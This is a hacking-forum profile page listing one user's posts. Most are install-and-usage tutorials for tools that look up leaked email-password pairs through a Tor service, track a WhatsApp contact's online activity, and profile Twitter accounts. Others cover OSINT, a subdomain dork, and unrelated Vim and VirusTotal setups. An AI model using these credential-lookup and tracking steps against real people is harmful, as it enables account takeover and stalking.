Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - qwartz

#1
La herramienta esta disponible nuevamente, para instalar ejecute:

Código: php

sudo apt install tor
git clone https://github.com/jxlil/pwndb.git; cd pwndb
pip3 install -r requirements.txt --user

# It's character % serves as a wildcard
python3 bin/pwndb.py -t john.%@gmail.com -V -o emails.json
#2
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Es un poco una reimplementación del karma, un parser para el servicio pwndb de tor. Lo que no entiendo es, que si hay que conectarse a tor para usar el programa, ¿Por que no vas directamente al servicio raiz en tor?. No se si te parece una reflexión coerente. Igual no.
¿Has pensado en utilizar cualquier servicio de tor2web para no obligar al usuario a disponer de tor? A fin de cuentas eso simplificaría enormemente el uso de la herramienta por parte del usuario.

Así es la herramienta tiene el mismo objetivo que Karma, en cuanto usar .Tor2Web o cualquier otro método de conectarse a sitios .onion sin utilizar la red Tor. En mi opinión no es una buena idea, ya que su anonimato se ve encarecido, es simplificar su conexión a sitios ocultos, pero a un gran coste en su privacidad. Aquí un poco de información sobre este tema: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta




No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Por otro lado, solo he oteado un poco el código del parser y no veo claro si estáis saltandoos o no el primer elemento que da la página de pwndb. Por siacaso lo comento, es una dirección de bitcoin que hay que saltarse porque no pertenece al leak en si. Hay que empezar a leer desde el segundo registro. Si lo habéis tenido en cuenta nada.

Enhorabuena por la herramienta y un saludo

Parece que es una dirección bitcoin donde puede hacer donaciones a los administradores del sitio.  Igual puede abrir un No tienes permitido ver los links. Registrarse o Entrar a mi cuenta para solicitar/sugerir estos cambios (Yo no mantengo el código de la herramienta).

Saludos!!
#3
Buenas a todos,

Ya hace algún tiempo publique un post sobre una herramienta llamada Karma con la cual se realizaban búsquedas de emails filtrados. Pero al parecer el repositorio de dicha herramienta a sido eliminado y aunque se pueden encontrar algunos forks: github(.)com/Yuribenjamin/karma/network/members ya no se esta manteniendo su código, por lo que pueden presentar varios errores.


pwndb


Para todos lo que deseaban utilizar Karma y ya no han podido, existe una alternativa llamada pwndb, esta escrita en Python3 y fue desarrollada por twitter(.)com/jxlil_  Para intalar puede serguir los siguiente pasos como se indica en el No tienes permitido ver los links. Registrarse o Entrar a mi cuenta de la herramienta.

Código: bash

sudo apt install python3 python3-pip git tor
pip3 install virtualenv --user

git clone https://github.com/jxlil/pwndb.git
cd pwndb

virtualenv venv
source venv/bin/activate

pip3 install -r requirements.txt --user


Modo de Uso:
Código: raw

usage: pwndb.py [-h] -t EMAIL [--password] [-V] [-o NAME_FILE] [--tor-proxy TOR_PROXY] [-v]

Leaked password finder

optional arguments:
  -h, --help                Show this help message and exit
  -t EMAIL, --target EMAIL  Set target email.
  --password                Search by password.
  -V, --verbose             Display results on screen.
  -o NAME_FILE, --output NAME_FILE
                        Save output in JSON format.
  --tor-proxy TOR_PROXY     Set Tor proxy.
  -v, --version             show program's version number and exit


Ejemplos:
Primero iniciamos el servicio de Tor
Código: raw

sudo service tor restart


Una vez iniciado, ya podemos hacer algunas consultas
Código: bash

# Una búsqueda simple
python3 bin/pwndb.py -t [email protected] -V -o emails.json

# EL carácter % es un comodín, es decir que puede ser cualquier cosa
python3 bin/pwndb.py -t john.%@gmail.com -V -o emails.json

# También se pueden buscar emails según su contraseña
python3 bin/pwndb.py -t 123456789 --password -V -o passwords.json

#4
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
[...] como hago para buscar un dominio no un correo especifico?

Para eso ejecute:
Código: bash
python3 bin/karma search gmail.com --domain


Vea el No tienes permitido ver los links. Registrarse o Entrar a mi cuenta del proyecto para mas ejemplos, como la búsqueda por local-part, dominio, contraseña.
#5

Es posible capturar el total de conexiones de un contacto en WhatsApp así como el tiempo de cada conexión, esto a través del servicio No tienes permitido ver los links. Registrarse o Entrar a mi cuenta de esta aplicación de mensajería. No tienes permitido ver los links. Registrarse o Entrar a mi cuenta a desarrollado un pequeño script en python3 con este propósito. A continuación mostrare los pasos a seguir para comenzar a capturar las conexiones de cualquiera de nuestros contactos.

Instalación:

CitarNOTA: Los siguientes pasos son para realizar la instalación en equipos Linux basados en Debian, si usted utiliza un SO diferente, puede intentar replicar estos pasos.

Esta programa esta alojado en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, por lo que bastara con clonarlo en nuestro equipo e instalar las dependencias y requerimientos necesarios. Para esto ejecute:

Código: bash

sudo apt install python3 python3-pip
git clone https://github.com/decoxviii/whatsapp_activity.git
cd whatsapp_activity
sudo -H pip3 install -r requirements.txt


Este script solo funciona con el navegador Chrome por lo que debera tenerlo instalado, ademas es necesario descargar el chromedriver que sea compatible con la versión de su navegador, para esto:

1. Verifique la versión de su navegador en mi caso es  75.0.3770.90, entre en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta para ver la version de su navegador.

2. Descargue el chromedriver compatible con su navegador entrando en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. En mi caso he descargado el driver No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Pruebas

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Antes de realizar cualquier prueba sera necesario que cambie la privacidad de su cuenta de WhatsApp entre en: Ajustes > Cuenta > Privacidad y cambie Hora de últ. vez a Nadie

Ahora ya puede realizar un prueba ejecute:
Código: bash
python3 bin/whatsapp_activity --chromedriver <ruta a chromedriver>


Ya solo debe seguir los pasos indicados por el script, les dejo un No tienes permitido ver los links. Registrarse o Entrar a mi cuenta con la finalidad de que pueda quedar un poco mas claro.

Espero les sea de utilidad. Un saludo!


#6
Buenas a todos,

En este post quisiera mostrarles una herramienta que me encontré hace poco por Internet, se trata de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, esta escrita en python3 y fue desarrollada por No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. Y aun que hay algunas otras alternativas como: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y No tienes permitido ver los links. Registrarse o Entrar a mi cuenta esta es la que desde mi opinión esta mas completa.




Esta herramienta al parecer es una API del sitio: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta que como pueden observar esta alojado en la 'deep web', dicho sitio contiene un base de datos con 1.4 billones de emails y sus contraseñas. Son bastantes emails, por lo que es muy posible que puedan encontrar algún resultado jugoso!

Instalación
A continuación mostrare como instalar la herramienta en Linux.

Es necesario instalar algunos paquetes, clonar el repositorio y instalar las librerías para python3.
Código: php

sudo apt install tor python3 python3-pip
git clone https://github.com/decoxviii/karma.git ; cd karma
sudo -H pip3 install -r requirements.txt


Si todo ha salido bien, no deberíamos tener ningún error al ejecutar
Código: php

python3 bin/karma.py --help


Uso
Una vez instalado todo lo necesario podemos comenzar a consultar algunos emails.

NOTA: Antes de utilizar la herramienta te aconsejaría verificar que el servicio de tor este corriendo ya que, de no ser así la herramienta dará error, para iniciar el servicio de tor ejecuta:
Código: php
sudo service tor start


Para buscar la contraseña de un email especifico ejecutamos (la opción -o | --output, nos permite guardar los resultados en formato json):
Código: php

python3 bin/karma.py target [email protected] -o resultado-x-email




También es posible buscar por contraseña, es decir, buscar todos los emails con la contraseña 123456789:
Código: php

python3 bin/karma.py search 13456789 --password


Hay otros métodos de búsqueda por ejemplo, buscar por local-part o por dominio.
Código: php

# devuelve todos los emails con el local-part johndoe
python3 bin/karma.py search johndoe --local-part

# devuelve todos los emails con el dominio example.com
python3 bin/karma.py search example.com --domain


Tambien es posible crear una lista de emails y que la herramienta consulte uno por uno, por ejemplo: Creamos el archivo emails.txt con el siguiente contenido:
Código: php

[email protected]
[email protected]
[email protected]


Y ejecutamos:
Código: php

python3 bin/karma.py target emails.txt





He realizado algunas pruebas y he obtenido algunos resultados positivos, pero también algunas contraseñas son viejas. También estoy pesando en que es posible recolectar varias contraseñas y crear un diccionario, ya que todos los resultados se pueden guardar un formato json. Pero bueno espero y les sea de utilidad.

Saludos!!





#7

Black Owl


Buenas a todos! Les comparto una nueva herramienta creada por No tienes permitido ver los links. Registrarse o Entrar a mi cuenta para la recolección de información de sitios web, dominios, emails, etc. Esta escrita en python 2.7 y basada en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

La herramienta contiene los siguientes modulos:

  • CMS Gathering - Detecta CMS (wordpress, joomla, magento, ...)
  • Email to Domain - Obtiene dominios registrados con 'x' email
  • Hackedmail - Verifica si se a hackedo 'x' email
  • IP Geolocation - geolocalizacion de IP
  • Namech_k - Obtiene informacion sobre un nombre de usuario
  • Subdomain Search - Busqueda de subdominios
  • Whois Domain - Se obtiene informacion de un dominio

Instalación: (GNU/Linux, OSX)
Código: bash

$ git clone https://github.com/qqwaszx/blackowl.git ; cd blackowl
$ pip install -r requirements.txt
$ python main.py

# Para ver los comandos disponibles ejecutamos:
: blackowl > help


Uso:
Mostrare el uso del modulo subdomain_search, que creo es uno de los mas interesantes, una vez iniciada la herramienta ejecutamos lo siguiente:
Código: bash

# si presionamos TAB se autocompleta el nombre del modulo o comandos disponibles
: blackowl > use subdomain_search

# Se carga el modulo, para ver las opciones ejecute:
: blackowl(core/modules/subdomain_search) > show_options
-  domain     : No value [Is required]
!  limit_search : No value

# a continuación veremos que es necesario dar valor a la opción domain y limit_search:
: blackowl(core/modules/subdomain_search) > set domain=google.com
: blackowl(core/modules/subdomain_search) > set limit_search=30

# Ahora ya podemos correr el modulo
: blackowl(core/modules/subdomain_search) > run
[...]

# Se pueden exportar los resultados obtenidos
: blackowl(core/modules/subdomain_search) > export
: blackowl(export file name ?) > file.txt
[+] Writing 'file.txt' file.
[+] File writed : export/file.txt



De esta manera he obtenido 30 subdominios de 'x' dominio, cabe mencionar que si no se da valor a la opción limit_search, la herramienta devolvera todos los subdominios que encuentre.

Crear mi modulo:
Esta herramieta ofrece la posibilidad de crear y agregar nuestros propios modulos, esto de la siguiente manera:

Código: bash

: blackowl > new_module
: blackowl(New module name ?) > mi_modulo
: blackowl(New module description ?) > este es mi primer modulo
[+] Module has been written core/modules/mi_modulo.py
-  Now add argument on 'self.require' & write your code in 'def main()'.


Ahora deberemos editar el modulo (core/modules/mi_modulo.py), de la siguiente manera:
En este caso estoy utilizando VIM, pero usted puede utilizar cualquier otro editor de codigo
Código: php
vim core/modules/mi_modulo.py


A continuación veremos el codigo del modulo:
Código: python

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#description:este es mi primer modulo.

from core.lib import colors
from core.lib import completer
import readline

#colors
C = colors.Palette()


class module_element(object):

    def __init__(self):
        self.title = "Example\n"
        self.require = {
            'enterprise':{'value':'', 'required':'yes'},
            'function':{'value':'', 'required':'no'}
        }

        self.export = []

        #completer
        comp = completer.Module(self.require)
        readline.parse_and_bind("tab: complete")
        readline.set_completer(comp.complete)


    def get_options(self, name):
        if name in self.require:
            return self.require[name]['value']
        else:
            return False


    def main(self):
        print "{}{} Running module: {}{}".format(C.OK, C.GREEN, self.title, C.END)

        # ------------------------------- #
        # delete this and write your code #
        # ------------------------------- #
        enterprise = self.get_options('enterprise')
        function = self.get_options('function')
        print " Enterprise: {}\n Function: {}\n\n Passwords fond:".format(enterprise, function)
        passwords = [
                'user:123456 :: pass:12345',
                'user:qwerty :: pass:uiop',
                'user:qwaszx :: pass:xzsawq'
        ]
        for line in passwords:
            print " - " + line
            self.export.append(line)
        print "\n Please execute: export"


Ahora editamos el codigo segun sean nuestras necesidades:
Código: python

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#description:este es mi primer modulo.

from core.lib import colors
from core.lib import completer
import readline

#colors
C = colors.Palette()


class module_element(object):

    def __init__(self):
        self.title = "Example\n"
        self.require = {
            # aqui se definen las opciones p. ej. dominio, email, website, etc.
            'user':{'value':'', 'required':'no'}
        }

        self.export = []

        #completer
        comp = completer.Module(self.require)
        readline.parse_and_bind("tab: complete")
        readline.set_completer(comp.complete)


    def get_options(self, name):
        if name in self.require:
            return self.require[name]['value']
        else:
            return False


    def main(self):
        print "{}{} Running module: {}{}".format(C.OK, C.GREEN, self.title, C.END)
        # Aqui escribimos el codigo que queramos
        # Para obtener los valores de las opciónes usamos la funcion get_options()
        user = get_options('user')
        print "Name user: " + user



Ahora podemos guardar y ejecutar nuestro propio modulo :)


Aunque la herramienta aun tiene pocos modulos algunos de ellos son interesantes (hackedmail, subdomain_search), no hace falta decir que es nueva por lo que puede presentar fallas.

Les dejo el video de demostración de la herramienta, donde se muestra el uso de algunos de los otros modulos No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Espero les sea de ayuda. Saludos!

#8
Hacking / Re:VTAPI desde Windows 10
Noviembre 05, 2017, 03:08:56 PM
Que tal @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, he intentado mejorar el código! puedes probar de nuevo.

Si tienes algún error/sugerencia por favor escríbeme en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta o vía No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#9
Hacking / Re:VTAPI desde Windows 10
Noviembre 04, 2017, 04:50:32 PM
Buenas! @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

El error es a causa de no tener instaladas las librerías requeridas: requests, argparse. Si tienes pip instalado puedes ejecutar:

Código: php
pip install requests argparse


Saludos!
#10
Hacking / Re:VTAPI desde Windows 10
Octubre 06, 2017, 10:25:25 PM
Gracias! por el aporte @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, creo que lo haz explicado mejor  ;D, un Saludo!!
#11
Gracias! @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, claro por mi no hay ningún problema! Saludos

Gracias por comentarlo @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta no lo había podido probar, Saludos!

Gracias por el aporte @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta estaba pensando en cambiar un poco el código para que pudiera correr en windows! me haz ahorrado el trabajo un Saludo!
#12
VTAPI


Esto es ideal para los amantes de la terminal, ¿Que es vtapi? es una simple API de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta con la cual podemos realizar un escaneo de algún archivo o bien de una url y obtener los resultados por terminal -como se muestra en el .gif- esta escrita en python, todas las pruebas las he hecho en GNU/Linux (Debian), pero esto también debería funcionar en la terminal de MacOS, en Windows con algún emulador de terminal tal vez logre funcionar (Si tienes uno de estos dos últimos SO y te a funcionado por favor házmelo saber en los comentarios). Si estas utilizando Windows como S.O. @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta a escrito un No tienes permitido ver los links. Registrarse o Entrar a mi cuenta sobre como correrlo en este sistema! (Gracias!)

Instalación (GNU/Linux/MacOS):


  • Requerimientos: requests, argparse (Estoy suponiendo que usted ya tiene pip instalado de no ser así ejecute: sudo apt install python-pip)

Código: php
sudo pip install requests argparse



  • Clonar vtapi: El proyecto esta alojado en Github

Código: php

git clone https://github.com/qwartz/vtapi.git; cd vtapi
python vtapi.py --version


Deberás registrarte en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta para poder conseguir una API Key, una vez que tengas tu cuenta de virustotal, copias tu API Key y la agregas en API/settings.py:


Código: python

# API/settings.py
VERSION = "1.2"
APIKEY = 'Aqui tu API key'
LOGS = False




Uso:
Ahora que ya lo tenemos instalado vtapi en nuestro ordenador, podemos hacer un escaneo de prueba ejecuta:

Código: bash

$ python vtapi.py --file test.bat


Análisis de los resultados:
Como podemos ver nos devuelve una tabla con los resultados:


Nos marca con rojo cuando un antivirus lo a detectado como malicioso y nos muestra algún detalle sobre el tipo de archivo que es.

ó para escanear una URL ejecuta:

Código: bash

$ python vtapi.py --url https://qwartz.github.io/


Como puedes ver igual se muestra una tabla con los resultados del escaneo!

Por ahora solo están disponibles esta dos opciones, si quieres agregar algo mas puedes hacer un fork -> pull requests con los cambios que creas necesarios o bien dejarlo en los comentarios :)

Igual si quieres crear tu propia API entra No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

...
#13
Hacking / Como usar Katoolin v1.3b en GNU/Linux
Septiembre 07, 2017, 04:18:36 PM
Katoolin:


Buenas a todos!
Seguro ya conocen o en algún momento han escuchado de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, si no es asi Katoolin es un script que nos ayuda en la instalación de las herramientas disponibles en los repositorios de Kali Linux desarrollada en python por @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.


Al parecer este script tiene aprox. un año sin ser actualizado, -digamos que ya es algo viejo- muy probablemente haya herramientas nuevas que no se hayan agregado o algunas que ya no esten disponibles en los repositorios. Pero se ha actualizado dicha herramienta y aquí algunos de los cambios:


  • El repositorio de Kali Linux se agrega/remueve automáticamente:
    Un problema constante era que las personas no removían el repositorio de Kali Linux por 'x' causa y al momento de hacer un: apt dist-upgrade tenían problemas con su sistema

  • Herramientas actualizadas:
    Algunas herramientas ya no estan disponibles en los repositorios de Kali Linux

  • Usted puede crear sus propias listas de herramientas:
    Usted puede crear un lista personalizada que se adapte de sus necesidades

  • Katoolin ahora es modular:
    Sera mas sencillo para otros desarrolladores agregar nuevas cosas o simplemente mejorar el código.
    Citar~/projects/katoolin/
    ├── katoolin.py 
    ├── No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
    └── core/:
            ├── No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
            ├── No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
            └── __init__.py

Instalación:
Para instalar este 'Fork' de Katoolin ejecute:
Código: bash

$ git clone https://github.com/qwartz/katoolin.git; cd katoolin
$ python katoolin



Uso:
A continuación se mostrara una lista de opciones:
Citar
1) View Categories
2) Update Katoolin
3) Help

4) Exit

Instalar una herramienta:
Para poder instalar una herramienta vamos primero a ver las categorías disponibles, para eso elegimos la opción 1) View Categories -Puede ejecutar el comando help para ver cada una de las opciones-

Se nos mostrara una lista de las categorías disponibles en: katoolin/core/categories.py Para cargar la lista de cualquier categoría ejecutamos: load=14 -Para la categoría 14 por ejemplo-

Ya solo queda seleccionar la herramienta e instalarla! por ejemplo: para instalar sqlmap
Citar
: katoolin > load=2
:: Vulnerability Analysis
[...]
25) sqlmap                   26) sqlninja
27) sqlsus                   28) thc-ipv6
29) tnscmd10g                30) unix-privesc-check
31) yersinia               
99) ALL
: katoolin (vulnerability_analysis) > 25

Crear mi propia lista de herramientas:
Para esto debemos editar el archivo: katoolin/core/categories.py
Si sabes un poco de python te daras cuenta que solo contiene un diccionario que almacena dos elementos el nombre de la categoría y la lista de herramientas, ahora sabiendo esto vamos al final del diccionario y agregamos nuestra nueva lista de la siguiente forma:

Código: python

[...]
14:['extra',
['kali-linux', 'kali-linux-full', 'kali-linux-all', 'kali-linux-top10', 'kali-linux-forensic',
'kali-linux-gpu', 'kali-linux-pwtools', 'kali-linux-rfid', 'kali-linux-sdr', 'kali-linux-voip',
'kali-linux-web', 'kali-linux-wireless', 'squid3']
],

15:['Nueva Lista',
['bettercap', 'nmap', 'sqlmap', 'etc']
]


Ahora al iniciar nuevamente la herramienta ya esta disponible la nueva lista de herramientas creada por ti! ahora bien si haz colocado mal el nombre de algún paquete o herramienta obviamente este no se instalara, por ejemplo: etc no existe en los repositorios de Kali Linux.

Actualizar katoolin:
Para actualizar solo seleccione la opción 2) Update Katoolin automáticamente se actualizara katoolin con sus ultimas modificaciones

Demo:



Espero esta nueva actualización de katoolin les sea de utilidad! Si tienen algún problema o sugerencia por favor dejen lo en los comentarios. Gracias por leer, Saludos!
#14

Son millones las personas que utilizan twitter día con día y a decir verdad es una muy buena herramienta para informarte sobre lo que esta pasando en el exterior, tan buena que personajes influyentes a nivel mundial la utilizan (@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta). Pero no todo es bueno!, es interesante la información que puede revelar twitter sobre tu actividad y hábitos.


¿Como?
Redes sociales como Twitter hacen uso de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, por lo que cada que creas un nuevo tweet vas dejando rastro, -Y .. ¿Como obtengo esos metadatos? afortunadamente/desafortunadamente se puede acceder a ellos por medio de la API de Twitter libremente.

¿Que puedo obtener?

  • Zona horaria y idioma establecidos para la interfaz de Twitter
  • Idiomas detectados en tweets
  • Fuentes utilizadas (aplicación móvil, navegador web, ...)
  • Geolocalizaciones
  • Hashtags más utilizados, la mayoría de los usuarios de retweeted, etc.
  • Actividad diaria / semanal

Al capturar una cantidad considerable de tweets, podríamos encontrar patrones que nos ayuden a obtener información interesante sobre la cuenta y por tanto de su administrador, como: geolocalizacion de quien(es) admistra(n) la cuenta.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta creo una herramienta desarrolla en python para este fin, de la cual haremos una prueba a continuación:

Github: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
(La instalación es sencilla, por lo que voy a obviar esa parte, si no tiene idea de como hacerlo puede leer el No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y seguir los pasos que se indican, si llegas a tener un problema déjelo en los comentarios)

Uso:
Código: php
$ python tweets_analyzer.py -n <cuenta>


Conclusion:
Es importante darse cuenta que cualquier persona tiene acceso a esta información -No solo el gob.-. En caso que seas usuario activo de twitter pueden obtener patrones que revelen tus hábitos y tu actividad diaria.



#15
@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Buen aporte! He visto que comparte bastantes dork's, por lo que quiero compartirte uno para buscar subdominios de una manera sencilla con google.

Dork: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta<URL>

Cambiando <URL> por el dominio.

Ejemplo:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Resultados de búsqueda:
Código: php

www.google.com
fiber.google.com
fonts.google.com
gsuite.google.com
domains.google.com
store.google.com
firebase.google.com
on.google.com
developers.google.com
privacy.google.com
photos.google.com
duo.google.com
hangouts.google.com
myactivity.google.com
cloud.google.com
design.google.com
families.google.com
plus.google.com
edu.google.com
madeby.google.com
enterprise.google.com
events.google.com
feedproxy.google.com
get.google.com
play.google.com


Obviamente no son todos los subdominios de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, pero si se pueden encontrar algunos para ser una búsqueda desde el navegador XD, espero y sea de utilidad a alguien Saludos!
#16
GNU/Linux / Re:VIM | Instalación y configuración
Junio 20, 2017, 09:22:17 PM
@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Gracias por leer! Espero le haya sido de utilidad, si encuentra algo nuevo (plugins, config. en vimrc, etc.) espero nos lo comparta! :)
#17
GNU/Linux / VIM | Instalación y configuración
Junio 20, 2017, 02:26:30 PM
VIM
Vim es un editor de texto disponible para instalar en GNU/Linux. Llevo poco tiempo de usarlo y en un comienzo me parecía bastante complejo de manejar, pensaba que no valía la pena cambiarlo por sublime-text, pero después de hacer algunas configuraciones se a convertido en el editor que mas utilizo. Espero que con este post se animen a probarlo para que puedan ver el potencial de este editor!.

La configuración que veremos a continuación es ideal si buscas comenzar a usar este potente editor, si ya llevas tiempo usando VIM posiblemente no encuentres nada nuevo!



Instalación:
Ejecute el siguiente comando para instalar vim en GNU/Linux (Debian):
Código: php
$ sudo apt-get install vim


CitarAl terminar la instalación te recomendaría iniciar vimtutor, es una pequeña guía sobre el manejo y uso básico de vim. Para iniciar vimtutor ejecute:
Código: php
$ vimtutor




Configuración:
Ahora que tienes las bases del uso de vim, podemos iniciar con las configuraciones del editor para eso crearemos un directorio con el nombre .vim y dentro del mismo un archivo con el nombre vimrc
Código: php
$ mkdir ~/.vim && touch ~/.vim/vimrc


Temas:

Es posible cambiar el tema de vim (esquema de colores) en mi caso utilizo No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, puedes entrar en la pagina: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y ver la gran variedad de temas que existen. En caso que quieras configurar un tema, primero debemos crear el directorio ~/.vim/colors, y dentro guardar el tema que hayas elegido.

Código: php
~/.vim/
|- vimrc
|- colors
    |- hybrid.vim


Ahora que tenemos el tema dentro de la carpeta colors vamos a editar el archivo vimrc, ejecutamos:
Código: php
$ vim ~/.vim/vimrc


Como podemos ver el archivo esta en blanco, vamos agregar las siguientes lineas:
Código: python
set background=dark
colorsheme hybrid       " Tema
syntax on               " Color-syntax
set number              " No. de colum.


Ahora que hemos agregado esta pequeña configuración, guardamos presionando: :wq, Al abrir vim nuevamente observaremos que la apariencia a cambiado, ahora tenemos diferente el tema de vim (set background=dark, colorcheme hybrid), también aparece el numero de columnas del archivo (set number), si editamos un archivo, por ejemplo: vim No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, notaremos un coloreado en syntaxis (syntax on)



Plugins
Existe una gran cantidad de plugins que nos ayudan a mejorar el uso de vim, estos son algunos de los que tengo instalados actualmente:

  • NERDtree (Mostrar árbol de directorio)
  • auto-paris (Automáticamente crea dos: {}, [], (), "", '')

Instalación de plug-vim
Para poder instalar plugins de una manera sencilla haremos uso de: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, para instalarlo debemos ejecutar el siguiente comando (En caso de tener algún problema visite la pagina del proyecto en Github)

Código: php
$ curl -fLo ~/.vim/autoload/plug.vim --create-dirs \
    https://raw.githubusercontent.com/junegunn/vim-plug/master/plug.vim


Una vez instalado veremos que se han agregado las carpetas: autoload, plugged
Código: php
~/.vim/
|- vimrc
|- colors/
|- plugged/
|- autoload/
    |- plug.vim


Instalación de plugins
Ahora bien para empezar a instalar plugins debemos editar el archivo vimrc, de la siguiente manera:

Código: python
" PLUGINS
call plug#begin('~/.vim/plugged')
Plug 'usuario/repositorio'
call plug#end()


Como podemos observar debemos ir agregando cada uno de los plugins que deseemos agregar, para instalar los dos plugins que te mencione anteriormente quedaría del siguiente modo:

Código: python
" PLUGINS
call plug#begin('~/.vim/plugged')
Plug 'jiangmiao/auto-pairs'
Plug 'scrooloose/nerdtree'
call plug#end()


Entonces le hemos indicado el nombre_usuario/nombre_repositorio donde esta alojado el plugin, ahora solo guardamos los cambios y ejecutamos el siguiente comando en vim para que inicie la instalación: :PlugInstall


Vimrc
Ya hemos trabajado un poco con el archivo vimrc, pero aun podemos agregar mas configuraciones para mejorar la experiencia con este editor de texto.

General
Vamos agregar lo siguiente (dentro del codigo esta un comentario indicando para que es cada linea):
Código: python
" ---------------------------------------------
" General
" ---------------------------------------------
set nocompatible        " Activar valores por defecto de Vim, en lugar de los de Vi
set history=1000        " Activar historial de 1000 lineas
" No generar backup, archivo .swp
set noswapfile
set nobackupa
"
set autoindent          " Indentado de la linea igual que la anterior
set expandtab           " Convertir tab en espacios
set shiftwidth=4        " Cambiar tab de 8 espacios a 4
set softtabstop=4



Interfaz
Vamos agregar lo siguiente (dentro del codigo esta un comentario indicando para que es cada linea):
Código: python
" ---------------------------------------------
" Interfaz
" ---------------------------------------------
set background=dark     " Fondo de vim
colorscheme hybrid      " Tema (Esquema de colores) para vim
syntax on               " Activar color de syntax
set number              " Mostrar el No. de colum.
" Ecxelente para copiar/pegar lineas de texto/codigo
set relativenumber      " Mostrar No. de colum. relativamente
" Ayuda a identificar la ubicacion exacta del cursor
set cursorline          " Mostrar linea en linea
set cursorcolumn        " Mostrar linea en columna
set showmatch           " Mostrar incio/fin de un parentecis
set mouse=a             " Activar en uso del mouse en vim
set ruler               " Mostrar en la parte inferior derecha medida de archivo en %
set laststatus=2        " Mostrar barra de status
set wildmenu            " Mostrar barra de autocompletado



Mapeo de Comandos
Vamos agregar lo siguiente (dentro del codigo esta un comentario indicando para que es cada linea):
Código: python
let mapleader=","       " Establecer ',' como tecla lider
"
"  NERDTree
nmap <Leader>nt :NERDTreeToggle<CR> " Cambiar comando ':NERDTreeToggle<Enter>' por ',' + nt<Enter>
let NERDTreeQuitOnOpen=1
let NERDTreeWinSize=20
"
"  Con la tecla F5 activamos/desactivamos el No. de colum. de modo: relativenumber
nmap <F5> :set invrelativenumber<CR>
imap <F5> <ESC>:set invrelativenumber<CR>a
"
"   Redimencionar paneles de una ventana con las teclas: j, k, l, h
nmap j :res +2<CR>      " Aumentar horizontal
nmap k :res -2<CR>      " Disminuir horizontal
nmap l :vertical res +2<CR>     " Aumentar vertical
nmap h :vertical res -2<CR>     " Disminuir vertical
"
" dividir ventana
nmap <Leader>h :split<CR>   " ',' + h<Enter> para divir ventana de manera horizontal
nmap <Leader>v :vsplit<CR>  " ',' + v<Enter> para divir ventana de manera vertical


Conclusión
Esta es una buena configuración inicial para empezar a usar VIM, con el tiempo puedes ir agregando nuevos plugins, temas, comandos, etc. Espero que este post te sea de ayuda para comenzar a usar esta potente herramienta. Seria bueno que en los comentarios dejaras los plugins que utilizas, la config. de tu vimrc, etc. Gracias por leer!



CitarDotfiles:
Me eh creado un repositorio en Github con mis 'dotfiles' donde se incluye esta configuración de vim, usted puede acceder al repositorio, clonarlo y ejecutar el archivo No tienes permitido ver los links. Registrarse o Entrar a mi cuenta automáticamente se instalara: tema, plugins, vimrc, etc.

ADVERTENCIA: Es posible que este repositorio cambie y se agreguen algunas cosas que no sean de VIM, sea cuidadoso antes de instalar!

Código: php
$ git clone https://github.com/qwartz/dotfiles.git && cd dotfiles
$ chmod +x install.sh && ./install.sh


Fuente:No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#18
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
De cualquier forma, como es fuerza bruta, no veo que sea muy diferente a enviar correo a todas las direcciones y esperar la respuesta de que el correo no existe.

Si tienes razón! la única diferencia es que usted puede estar seguro que los correos que obtenga si están registrados, pero aun así estos tal vez no sean utilizados
#19
@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Espero que te haya sido útil la información, ojala y comparta su herramienta ;)
#20
Actualmente No tienes permitido ver los links. Registrarse o Entrar a mi cuenta tiene una 'vulnerabilidad' que permite encontrar gran cantidad de direcciones de correo, dicho error fue encontrado por @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, y como de costumbre fue ignorado por Gmail.

